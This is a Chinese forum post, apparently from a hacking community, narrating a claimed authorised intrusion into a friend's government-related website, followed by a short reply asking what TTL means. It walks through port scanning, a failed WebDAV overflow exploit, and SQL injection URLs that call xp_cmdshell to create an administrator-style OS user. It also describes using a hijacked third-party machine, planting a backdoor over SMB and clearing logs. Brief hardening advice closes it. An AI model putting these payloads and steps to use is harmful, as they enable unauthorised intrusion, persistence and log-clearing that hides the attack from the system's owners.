一次完整的入侵检测

一次完整的入侵检测


正文:
一次在Q上,好朋友让我为他的网站来次模拟进攻,测试一下其网站的安全性.要求是得到最高权限,查看漏洞所在.在得到批准的情况下我答应了他的请求.第2天晚上开始对其网站进行检测:
目标:取得管理员权限,在网站中留一个网页,收集漏洞情况.
计划:第一天进行踩点,第二天测试进攻,第三天看看网站的论坛……最终取得管理员权限.
1.好久没有入侵了,很多都不会了,不过步骤还是要的.首先进行踩点,当然不是盲目的去扫描,先ping了一下他的网站.
Ping www.inday.com
Pinging www.inday.com [210.10.10.10] with 32 bytes of data:
Reply from 210.10.10.10: bytes=32 time=60ms TTL=115
Reply from 210.10.10.10: bytes=32 time=50ms TTL=115
Reply from 210.10.10.10: bytes=32 time=50ms TTL=115
Reply from 210.10.10.10: bytes=32 time=60ms TTL=115
Ping statistics for 210.10.10.10:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 50ms, Maximum =  60ms, Average =  55ms
恩,速度不错,看了看TTL看来有什么路由或者防火墙之类的.
打开浏览器,输入网址:http://www.inday.com 看了看,不错嘛,一个政府相关站点.稍微看了看,找到一个论坛,动网5.0的,网页采用asp的文章系统,不知道是哪个.可能有人会说用动网的洞直接得到密码就好拉,不错,这是一种方法,其实我是那里的管理员,想得到密码很容易,但此次入侵的目的就没达到了,所以我没用此方法.心想是如果实在不行,就利用动网的洞44.好,网站看好了,我在浏览器里输入了他的IP:210.10.10.10 晕！此页面无法显示.心想:不会吧,虚拟主机要我入侵,那怎么会是得到批准的呢？？再说一般的虚拟主机都很稳定,管理员都非常负责.诶,管他呢,继续.
基本的探测可以了,下面请出扫描器.很多人会选用1种扫描器进行网站测试,但我不认为这样很好,因为很多扫描器都有自己的特性.比如x-scan的详细,流光的快,还有一些针对特定漏洞的扫描器等等.所以这次我采用了很多扫描器.
先我使用了流光5,不错吧,不要羡慕,我们联盟有下载,破解了时间和IP限制的.
OK,开始扫描,如果你不会,那你看看流光的帮助好了,本文不谈如何使用.榕哥的作品就是好,虽然不知道流光5是不是榕哥做的,但很多都是基于流光4.7的.没到4分钟,扫描完毕,查看扫描记录:
扫描 210.10.10.10 IIS5.0 NULL.Printer Exploit ...成功(不提了,从没成功过)
PORT-> 主机 210.10.10.10 端口 0080 ....开放
PORT-> 主机 210.10.10.10 端口 0021 ....开放 (不错,如果是虚拟主机空间就可以暴力破解)
PORT-> 主机 210.10.10.10 端口 0110 ....开放
PORT-> 主机 210.10.10.10 端口 0025 ....开放
FTP-> 主机 210.10.10.10 FTP 版本信息 .... Serv-U FTP Server v4.0 for WinSock ready...(据说有溢出漏洞,等会再说)
PORT-> 主机 210.10.10.10 端口 0139 ...开放 (失望,这种端口都看得见)
IIS-> 主机 210.10.10.10 IIS检测 FrontPage 扩展 ...成功 (老漏洞了,不过我没成功过)
PLUGIN-> 扫描 210.10.10.10 IIS 5.0 WEBDAV Exploit ...成功 (我喜欢,不过成功率很小)
PORT-> 主机 210.10.10.10 端口 0443 ....开放
PORT-> 主机 210.10.10.10 端口 1433 ....开放 (这个是关键点)
太让人失望了,一台服务器开了那么多端口不说还有那么多漏洞.从流光的扫描中我看到一份非常重要的信息.此机的计算机名就是网站名字,而且看到开放了1433端口,所以在此我确信为主机托管(老兄,托错人了).
在这里我开始探测性的攻击了一次,使用的是webdav漏洞.
D:\>webdavx3.pl 210.10.10.10
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 210.10.10.10 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
………………
没有成功,这里我感到很奇怪,webdav的溢出程序对没打补丁的机器(因为都是些老漏洞,一开始以为没打什么补丁,害我走了很多弯路)怎么不起作用啊(先前认为的,后面才知道错了).
今天的目的是踩点,所以这些资料是不够的,知己知彼,百战不殆.能有多的信息就尽量多.拿出x-scan进行探测……2分钟后,x-scan把我电脑资源吃光,被迫重启！
好,GUI不行那cmd进行扫描,2分钟后……x-scan又把我资源耗尽,再次重启.眼睛冒火了.....
开启肉鸡,3389的,不错吧,在这里谢谢海兄提供肉鸡
好,在肉鸡上把该用的都下载来,先用x-scan扫描.机器好没办法,速度极快,大概10分钟后OK了.看看结果,呵呵,x-scan果然是好东西,比较具体.
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/scripts/samples/search/qfullhit.htw
/scripts/samples/search/qsumrhit.htw
/null.ida
/null.idq
/abczxv.htw
/default.asp
/default.asp
一下子多了那么多CGI漏洞,而且还扫描出了一个令人兴奋的端口:3389.
OK,再次探测性攻击,打开终端连接器,填入端口,1,2,3,看见登入画面了.看看输入法.....晕死,打好了,怎么会？？？开始疑惑了.算了,看看其他的吧.我把上面的漏洞找了遍,都没成功,看来运气不好,不过有一个漏洞到成功了,但是路径没猜对./scripts/samples/search/qfullhit.htw
在绿盟的漏洞资料里查到这个漏洞存在着越界查看漏洞,就是说可以查看任意文件.可是....因为不知道具体路进,都没成功,而且他的web站点放在了D盘,所以没有成功(事后知道的).CGI啊CGI为什么我老不行呢？不相信,随后去了绿盟找了点EXPilot,编译后进行探测攻击,X,失败告终..
难道非要我从论坛入手？？？我偏不要.冷静下来后我决定再次看看网页,随后又找了扫描器老大哥SSS进行扫描.
在观察网页种,无疑进入了下载页面,看来还没做好.无疑间我点了回首页的连接,晕,卡住了,看看连接地址,晕,file://d:/defual.asp 百密必有一疏,看到路径了,可....两个盘符,跨盘符好像没提到,不管了,先试试吧,10分钟过去,依然不行,看来又走不通了.看看肉鸡的SSS扫描结果,老大哥就是老大哥,没话说,对于CGI的准确性非常厉害,那些漏洞虽然扫出来了,但前面有个X说明是个幌子,不过有一个,查找资料.绿盟竟然没有？？那去google看看,找到几个,看了看漏洞介绍,针对iis4.0的,晕,白开心了,那怎么入手呢？？？？
看了看时间,2点了,明天上课,所以今天倒此了,不过目的达到了,毕竟今天的任务是踩点.睡觉先.

第二天,晚上9点,呵呵,精神来了,继续昨天的排演.本来今天想整理下资料看看的,可还是不死心,又开始了扫描,结果一样.
刚想起来是有MSsql数据库的,找找最新的资料,看到MYSQL有溢出漏洞,编译了攻击程序,试验了下,结果是,失败 看看网页吧.
找到一个网管信箱,看看.......是webclint邮件服务器,看看版本,晕,6.8的,我记得的漏洞是2.4的,看来又不行了,诶,真不甘心.看看文章系统吧,总觉得是免费的文章系统,不过是利用SQL数据库的.先看看他的查询:
http://www.inday.com/gunye.asp?boardID=5
http://www.inday.com/news.asp?boardID=2
下面都雷同,只是asp页不同,关键语句是boardID,使用的查询语句可能是
"select * from where boardid="&boardid&"……
后面我就猜不到了,再看看新闻页面
http://www.inday.com/ShowAnnounc ... ;ID=1194&tion=7
标准的新闻系统,呵呵,那我们来44SQL 注入攻击看看.注意,SQL注入问题非常严重,请大家不要乱用下面的演示.相关资料网上已经有很多了,这里不再介绍.
我使用了http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin RHC进行查看,返回了语法错误,我再继续
http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin hax--,返回
ADODB.Recordset 错误 '800a0cb3'
当前记录集不支持书签.这可能是提供程序或选定的游标类型的限制.
/news.asp,行358
成功,yeah..........兴奋中！！！
然后我就一步一步添加了一个用户.哦,对了,还没说这个漏洞呢,这个漏洞是针对ASP+SQL的,一些asp页面没有进行过滤,使攻击者能执行任意命令,很简单,SQL我想大家都知道吧,如果得到用户密码就等于知道了这台主机的控制权.那我在SQL里创建一个本地用户没有问题吧,好我们来创建.以下程序很危险,请勿试.这里提一下,后面的—是SQL语句的注释,那后面的语句就不起作用了,嘿嘿.
http://www.inday.com/news.asp?id=2;exec master.dbo.sp_addlogin RHC;--
http://www.inday.com/news.asp?id=2;exec master.dbo.sp_password RHC,www.realhack.org;--
http://www.inday.com/news.asp?id=2;exec master.dbo.xp_cmdshell 'net user RHC www.realhack.org /workstations:* /times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
哈哈,创建了一个RHC用户,密码为www.realhack.org.现在那个3389就可以用了,打开终端连接器,输入用户名和密码,OK,进入..进入...进入.......终端已经超过最大连接数.....狂晕！！

这时候我们的目的基本达到了,该是清理战场,然后写报告的时候了.既然3389不能进,但是139还开着,OK,net use 上去,我传了朋友做的一个后门程序,然后看了看他们的配置和web的存放位置,和我猜的没错,采用分盘管理.很严谨.在C盘,意外看见了w2ksp3补丁 ,看来先前的失败是有原因的.好了,清理日记,留了个页面告诉了我朋友一声.

总结:
这次入侵一开始没有走对路线,一直以为什么补丁都没打,害的我走了很多弯路,在2天里找了很多溢出程序,但都一一失败.在中间我还使用了flashget的站点资源探测工具得到了非常有用的信息,站点的结构我都是从哪里得知的.其实一开始不想用SQL 注入问题来进行入侵的,但这次是安全检测,当然要全面些,所以用了最新搞到的资料.而且此问题只在ASP+SQL的服务器上才会有,一般的虚拟空间是不存在的.此问题相当严重,请不要随意破坏！！！国内主机！！！！我是得到入侵许可的情况下进行的攻击,如果使用上述方法进行破坏,本人不承担任何责任.
对于服务器的安全我也来说说,从一开始的扫描,我就认为他们的主机有问题(结果不是主机问题),一些不必要的端口开了,比如139,445,135等高危险端口都打开了,这是不应该的,至少也要进行防火墙的端口过滤吧.比如139,成了我成功的关键,因为在终端连接上不允许我连接,如果139没有开的话我可能还会费一些时日.其实问题不止一处,一些有问题的网页不应该放在主页上,比如上述说道的下载页面,完全可以让别人猜到路径,要知道物理路径对于一个攻击者来说是很重要的.目前最严重,谈论最多的莫过于SQL注入问题了,入侵的时候我把isno的SQL注入问题读了好几遍,高手就是高手,不像我这样的烂文章.后来我把他们的文章系统看了看,查询语句根本不存在任何过滤,使我感到很惊讶,听朋友说这个文章系统是花钱请专门的人修改一个免费文章系统的,竟然一点常识都没有,真是可悲.虽然SQL问题已经公开很久了,可是国内很多网站都存在问题,动网的洞一个接一个,LB的洞又接踵而来,真是令人发指啊.

LZ  请解释下 这个代表什么


TTL=115